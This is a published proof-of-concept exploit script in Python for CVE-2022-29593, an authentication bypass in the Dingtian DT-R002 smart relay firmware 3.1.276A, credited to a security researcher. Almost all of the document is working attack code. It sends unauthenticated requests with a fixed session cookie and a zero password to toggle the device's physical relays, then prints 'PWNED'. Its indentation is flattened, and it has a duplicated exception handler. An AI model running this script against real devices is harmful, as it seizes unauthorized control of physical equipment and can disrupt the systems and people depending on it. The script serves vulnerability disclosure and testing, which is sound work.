Dingtian-DT-R002 3.1.276A Authentication Bypass

`# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass  
# Google Dork: NA  
# Date: 13th July 2022  
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)  
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/  
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html  
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download  
# Version: V3.1.276A  
# Tested on: MAC OSX  
# CVE : CVE-2022-29593#!/usr/local/bin/python3  
# Author: Victor Hanna (SpiderLabs)  
# DingTian DT-R002 2CH Smart Relay  
# CWE-294 - Authentication Bypass by Capture-replay  
  
import requests  
import re  
import urllib.parse  
from colorama import init  
from colorama import Fore, Back, Style  
import sys  
import os  
import time  
  
from urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)  
  
def banner():  
print ("[+]********************************************************************************[+]")  
print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")  
print ("| Description: DingTian DT-R002 2CH Smart Relay |")  
print ("| Usage : "+sys.argv[0]+" <host> <relay#> |")   
print ("[+]********************************************************************************[+]")  
  
def main():  
os.system('clear')  
banner()  
urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"  
urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"  
urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"  
urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"  
  
headers = {  
"Host": ""+host+"",  
"User-Agent": "9lyph/3.0",  
"Accept": "*/*",  
"Accept-Language": "en-US,en;q=0.5",  
"Accept-Encoding": "gzip, deflate",  
"DNT": "1",  
"Connection": "close",  
"Referer": "http://"+host+"/relay_cgi.html",  
"Cookie": "session=4463009"  
}  
  
print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")  
for i in range(5):  
time.sleep (1)  
print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")  
try:  
if (relay == "1"):  
print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)  
r = requests.get(urlRelay1On)  
time.sleep (5)  
print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)  
r = requests.get(urlRelay1Off)  
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")  
elif (relay == "2"):  
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)  
r = requests.get(urlRelay2On)  
time.sleep (5)  
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)  
r = requests.get(urlRelay2Off)  
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")  
else:  
print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)  
except KeyboardInterrupt:  
sys.exit(1)  
except requests.exceptions.Timeout:  
print ("[!] Connection to host timed out !")  
sys.exit(1)  
except requests.exceptions.Timeout:  
print ("[!] Connection to host timed out !")  
sys.exit(1)  
except Exception as e:  
print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)  
  
if __name__ == "__main__":  
if len(sys.argv)>2:   
host = sys.argv[1]  
relay = sys.argv[2]  
main ()  
else:  
print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)  
  
`